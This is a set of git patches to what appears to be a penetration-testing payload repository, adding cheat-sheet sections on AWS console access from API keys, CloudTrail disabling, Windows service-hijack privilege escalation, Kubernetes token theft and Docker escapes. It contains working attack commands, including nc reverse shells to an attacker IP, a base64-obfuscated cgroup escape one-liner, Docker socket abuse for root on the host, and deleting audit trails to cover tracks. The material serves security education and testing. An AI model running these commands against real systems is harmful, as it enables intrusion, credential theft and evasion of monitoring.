From 1538ccd7f2932492006c4e97347cf80c19fd9f9a Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 19 Mar 2020 11:59:49 +0100
Subject: [PATCH 01/85] Gaining AWS Console Access via API Keys

---
 .../Cloud - AWS Pentest.md                    | 21 ++++++++++++++++++-
 .../Cloud - Azure Pentest.md                  |  5 ++++-
 2 files changed, 24 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
index bfe25c0..904f7d8 100644
--- a/Methodology and Resources/Cloud - AWS Pentest.md	
+++ b/Methodology and Resources/Cloud - AWS Pentest.md	
@@ -12,6 +12,7 @@
   * [Method for Container Service (Fargate)](#method-for-container-service-fargate)
 * [AWS - Shadow Admin](#aws---shadow-admin)
   * [Admin equivalent permission](#admin-equivalent-permission)
+* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
 * [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
 * [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
 * [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
@@ -331,6 +332,23 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
     $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub
     ```
 
+## AWS - Gaining AWS Console Access via API Keys
+
+A utility to convert your AWS CLI credentials into AWS console access.
+
+```powershell
+$> git clone https://github.com/NetSPI/aws_consoler
+$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED]
+2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments...
+2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic.
+2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established.
+2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session.
+2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established.
+2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler.
+2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated!
+https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED
+```
+
 ## AWS - Mount EBS volume to EC2 Linux
 
 :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
@@ -570,4 +588,5 @@ https://github.com/DenizParlak/Zeus
 * [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
 * [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
 * [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
-* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
\ No newline at end of file
+* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
+* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
\ No newline at end of file
diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index 3cbe340..26548db 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -251,6 +251,7 @@ ForEach($role in $roles) {
 $roleUsers
 
 ### Enumeration using Microburst
+git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1
 Import-Module .\MicroBurst.psm1
 
 # Anonymous enumeration
@@ -258,6 +259,7 @@ Invoke-EnumerateAzureBlobs -Base company
 Invoke-EnumerateAzureSubDomains -base company -verbose
 
 # Authencticated enumeration
+Get-AzureADDomainInfo
 Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo
 Get-MSOLDomainInfo
 ```
@@ -426,4 +428,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
 * [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) 
 * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
 * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
-* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
\ No newline at end of file
+* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
+* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
\ No newline at end of file

From 4303caa08c699b7b41501b1da7346e6a7ef7416c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 19 Mar 2020 12:03:32 +0100
Subject: [PATCH 02/85] README - Summary update

---
 README.md | 21 ++++-----------------
 1 file changed, 4 insertions(+), 17 deletions(-)

diff --git a/README.md b/README.md
index f6586c4..478a9a5 100644
--- a/README.md
+++ b/README.md
@@ -17,6 +17,9 @@ You might also like the `Methodology and Resources` folder :
 
 - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
   - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
+  - [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md)
+  - [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)
+  - [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md)
   - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
   - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
   - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)  
@@ -31,23 +34,7 @@ You might also like the `Methodology and Resources` folder :
   - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
   - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
   - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
-
 - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
-    - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
-    - Apache Struts 2 CVE-2017-9805.py
-    - Apache Struts 2 CVE-2018-11776.py
-    - Docker API RCE.py
-    - Drupalgeddon2 CVE-2018-7600.rb
-    - Heartbleed CVE-2014-0160.py
-    - JBoss CVE-2015-7501.py
-    - Jenkins CVE-2015-8103.py
-    - Jenkins CVE-2016-0792.py
-    - Rails CVE-2019-5420.rb
-    - Shellshock CVE-2014-6271.py
-    - Tomcat CVE-2017-12617.py
-    - WebLogic CVE-2016-3510.py
-    - WebLogic CVE-2017-10271.py
-    - WebLogic CVE-2018-2894.py
-    - WebSphere CVE-2015-7450.py
+
 
 You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.

From 2bdbb2dbc5f225fa7329cb70204c6f1d85d7551d Mon Sep 17 00:00:00 2001
From: Fanis Katsimpas <katsimpas.f@gmail.com>
Date: Sun, 22 Mar 2020 19:25:35 +0000
Subject: [PATCH 03/85] Update Windows - Privilege Escalation.md

Make powershell on EoP - Runas easier to copy paste
---
 .../Windows - Privilege Escalation.md                  | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 2b67480..4283e23 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -12,7 +12,7 @@
     * [Search for file contents](#search-for-file-contents)
     * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
     * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
-    * [Passwords in unattend.xml](#passwords-in-unattend.xml)
+    * [Passwords in unattend.xml](#passwords-in-unattendxml)
     * [Wifi passwords](#wifi-passwords)
     * [Passwords stored in services](#passwords-stored-in-services)
     * [Powershell history](#powershell-history)
@@ -712,9 +712,9 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
 ```
 
 ```powershell
-$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
-$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
-$ computer = "<hostname>"
+$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
+$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
+$computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 
@@ -979,4 +979,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
 * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
 * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
 * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
-* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
\ No newline at end of file
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)

From 1b190939c48fa0b7543f77fb8168f100b5cdc412 Mon Sep 17 00:00:00 2001
From: PixeL <officialpixelinc@gmail.com>
Date: Mon, 23 Mar 2020 17:17:42 -0500
Subject: [PATCH 04/85] Remove example from win priv esc

This example was used on hackthebox where it leaked the root flag of a machine on free servers.
This resulted in every user being able to get the root flag before they have even completed the box which isn't fair to others.

This example should either be changed or removed completely to combat copy-pasting without knowing what you're doing.
---
 Methodology and Resources/Windows - Privilege Escalation.md | 1 -
 1 file changed, 1 deletion(-)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 4283e23..6a2af2b 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -519,7 +519,6 @@ Prerequisite: Service account
 
 ```powershell
 PS C:\Windows\system32> sc.exe stop UsoSvc
-PS C:\Windows\system32> sc.exe config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt"
 PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe qc usosvc

From a3cc577ebda5414c7903cf69ba819ac52d317003 Mon Sep 17 00:00:00 2001
From: guenicoe <62290334+guenicoe@users.noreply.github.com>
Date: Tue, 24 Mar 2020 20:15:59 +0000
Subject: [PATCH 05/85] added cmd on the USOSVC vuln

Added `cmd \c C:\Users\nc.exe` as not typing `cmd \c` did not work for me. Might need even more explanation
---
 Methodology and Resources/Windows - Privilege Escalation.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 6a2af2b..d4b05d6 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -521,6 +521,7 @@ Prerequisite: Service account
 PS C:\Windows\system32> sc.exe stop UsoSvc
 PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
+PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe qc usosvc
 [SC] QueryServiceConfig SUCCESS
 

From 95ab07b45eccbd57c00a889328187ba6356ec6f4 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 28 Mar 2020 12:01:56 +0100
Subject: [PATCH 06/85] CloudTrail disable, GraphQL tool

---
 GraphQL Injection/README.md                   |  1 +
 .../Active Directory Attack.md                |  7 +++++++
 .../Cloud - AWS Pentest.md                    | 19 +++++++++++++++++++
 3 files changed, 27 insertions(+)

diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 3a9883b..3719113 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -24,6 +24,7 @@
 * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
+* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
 
 ## Exploit
 
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 395c02f..0da35ca 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -771,6 +771,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
 Using `impacket` to get the hash and `hashcat` to crack it.
 
 ```powershell
+# example
+$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
+Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
+
+[*] Getting TGT for svc-alfresco
+$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4
+
 # extract hashes
 root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
 root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
index 904f7d8..2342c2b 100644
--- a/Methodology and Resources/Cloud - AWS Pentest.md	
+++ b/Methodology and Resources/Cloud - AWS Pentest.md	
@@ -474,6 +474,25 @@ Prerequisite:
 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
 
 
+## Disable CloudTrail
+
+```powershell
+$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
+```
+
+Disable monitoring of events from global services 
+
+```powershell
+$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event 
+```
+
+Disable Cloud Trail on specific regions
+
+```powershell
+$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
+```
+
+
 ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
 
 :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.

From be8f32b5865ae365a2623ee33009883686457900 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 29 Mar 2020 16:48:09 +0200
Subject: [PATCH 07/85] Docker escape and exploit

---
 Kubernetes/readme.md                          |  13 +-
 .../Container - Docker Pentest.md             | 132 ++++++++++++++++++
 2 files changed, 144 insertions(+), 1 deletion(-)
 create mode 100644 Methodology and Resources/Container - Docker Pentest.md

diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md
index d409dc0..984d621 100644
--- a/Kubernetes/readme.md
+++ b/Kubernetes/readme.md
@@ -25,6 +25,16 @@
 
 * [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios.
 
+## Service Token
+
+> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.
+
+```powershell
+$ cat /var/run/secrets/kubernetes.io/serviceaccount
+
+# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting
+```
+
 ## RBAC Configuration
 
 ### Listing Secrets
@@ -188,4 +198,5 @@ http://<external-IP>:10255/pods
 ## References
 
 - [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1)
-- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2)
\ No newline at end of file
+- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2)
+- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
\ No newline at end of file
diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
new file mode 100644
index 0000000..c4682cf
--- /dev/null
+++ b/Methodology and Resources/Container - Docker Pentest.md	
@@ -0,0 +1,132 @@
+# Docker Pentest
+
+> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers.
+
+## Summary
+
+- [Tools](#tools)
+- [Mounted Docker Socket](#mounted-docker-socket)
+- [Open Docker API Port](#open-docker-api-port)
+- [Insecure Docker Registry](#insecure-docker-registry)
+- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
+- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
+- [References](#references)
+
+## Tools
+
+* Dockscan : https://github.com/kost/dockscan
+    ```powershell
+    dockscan unix:///var/run/docker.sock
+    dockscan -r html -o myreport -v tcp://example.com:5422
+    ```
+
+## Mounted Docker Socket
+
+Prerequisite:
+* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"`
+
+Usually found in `/var/run/docker.sock`, for example for Portainer.
+
+```powershell
+curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json
+curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create
+curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
+```
+
+
+## Open Docker API Port
+
+Prerequisite:
+* Docker runned with `-H tcp://0.0.0.0:XXXX`
+
+```powershell
+$ nmap -sCV 10.10.10.10 -p 2376
+2376/tcp open  docker  Docker 19.03.5
+| docker-version:
+|   Version: 19.03.5
+|   MinAPIVersion: 1.12
+```
+
+Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`.
+
+```powershell
+$ export DOCKER_HOST=tcp://10.10.10.10:2376
+$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0  -t ubuntu bash
+or
+$ docker -H  open.docker.socket:2375 ps
+$ docker -H  open.docker.socket:2375 exec -it mysql /bin/bash
+or 
+$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq
+$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
+```
+
+From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`.
+
+
+## Insecure Docker Registry
+
+Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`.
+
+```powershell
+curl https://registry.example.com/v2/<image_name>/tags/list
+docker pull https://registry.example.com:443/<image_name>:<tag>
+```
+
+Access a private registry using OAuth Token from Google
+
+```powershell
+curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email
+curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token 
+docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
+```
+
+
+## Exploit privileged container abusing the Linux cgroup v1
+
+Prerequisite (at least one): 
+ * `--privileged`
+ * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags.
+
+```powershell
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -'
+```
+
+Exploit breakdown :
+
+```powershell
+# On the host
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
+ 
+# In the container
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+ 
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+ 
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+ 
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+```
+
+## Breaking out of Docker via runC
+
+> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to.  - Vulnerability overview by the runC team
+
+Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736
+
+```powershell
+$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
+$ docker run --rm cve-2019-5736:malicious_image_POC
+```
+
+## References
+
+- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
+- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
+- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
+- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
+- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
+- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
\ No newline at end of file

From 1d299f55c9d8659a151d23db5e1356d9c7bca875 Mon Sep 17 00:00:00 2001
From: M4x <aboultraman@gmail.com>
Date: Sun, 29 Mar 2020 23:40:39 +0800
Subject: [PATCH 08/85] Delete unnecessary escape characters

`whoami` has already been wrapped in backquotes. There is no need to user escape characters again
---
 Methodology and Resources/Linux - Privilege Escalation.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index e11bcee..26847cb 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -434,7 +434,7 @@ Tool: [wildpwn](https://github.com/localh0t/wildpwn)
 List world writable files on the system.
 
 ```powershell
-find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
+find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
 find / -perm -2 -type f 2>/dev/null
 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 ```
@@ -696,4 +696,4 @@ https://www.exploit-db.com/exploits/18411
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
-* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
\ No newline at end of file
